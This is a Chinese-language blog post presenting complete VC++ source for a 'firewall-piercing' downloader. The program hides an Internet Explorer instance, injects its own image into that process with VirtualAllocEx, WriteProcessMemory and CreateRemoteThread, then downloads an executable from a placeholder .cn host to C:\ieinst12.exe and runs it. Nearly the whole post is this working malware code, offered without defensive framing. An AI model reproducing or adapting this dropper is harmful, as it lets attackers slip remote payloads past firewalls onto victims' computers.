一段可以穿过防火墙的病毒程序

3k穿墙下载者VC源代码:

/* 
   "mini_downloader" 
   code bykardinal p.s.t 
   compile by vc++ 6.0 
   can not run under win98; 
*/ 
#include <windows.h> 
#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"kernel32.lib") 
//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释,编译出的文件只有2K大小 
//#pragma comment(linker, "/merge:.data=.text")    
//#pragma comment(linker, "/merge:.rdata=.text")    
//#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/ENTRY:main")    
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker, "/BASE:0x13150000") 
    
   HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数 
   DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数 
   HANDLE processhandle; 
   DWORD pid; 
   HINSTANCE hshell,hurlmon; 
void download() //注入使用的下载函数 

   hshell=LoadLibrary("Shell32.dll"); 
   hurlmon=LoadLibrary("urlmon.dll"); 
   (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA"); 
   (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA"); 
   DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL); 
   SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5); 
   ExitProcess(0); 
}; 
    
void main() //主函数 
{    
    //1.得到IE路径,并运行 
   char iename[MAX_PATH],iepath[MAX_PATH]; 
   ZeroMemory(iename,sizeof(iename)); 
   ZeroMemory(iepath,sizeof(iepath)); 
   GetWindowsDirectory(iepath,MAX_PATH); 
   strncpy(iename,iepath,3); 
   strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE"); 
   //strcat(iename,"windows\\notepad.EXE"); 
   WinExec(iename,SW_HIDE); 
   Sleep(500); 
   //2.得到 IE process handle 
   HWND htemp; 
   htemp=FindWindow("IEFrame",NULL); 
   GetWindowThreadProcessId(htemp,&pid); 
   processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 
    
   //3.分配内存 
   HMODULE Module; 
   LPVOID NewModule; 
   DWORD Size; 
   LPDWORD lpimagesize; 
   Module = GetModuleHandle(NULL);//进程映像的基址 
   //得到内存镜像大小 
   _asm 
   { 
       push eax; 
       push ebx; 
       mov ebx,Module; 
       mov eax,[ebx+0x3c]; 
       lea eax,[ebx+eax+0x50];     
       mov eax,[eax] 
       mov lpimagesize,eax; 
       pop ebx; 
       pop eax; 
   }; 
   Size=(DWORD)lpimagesize; 
   NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置 
   //4.写内存,创建线程 
   WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据 
   LPTHREAD_START_ROUTINE entrypoint; 
   __asm 
   { 
       push eax; 
       lea eax,download; 
       mov entrypoint,eax; 
       pop eax 
   } 
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行 
    
   //5.关闭对象 
   CloseHandle(processhandle); 
   return; 
} ;

文章如转载,请注明转载自【网管小王的独立博客】:http://www.5iadmin.com/

你可能感兴趣的:(防火墙,源代码,include,comment,的)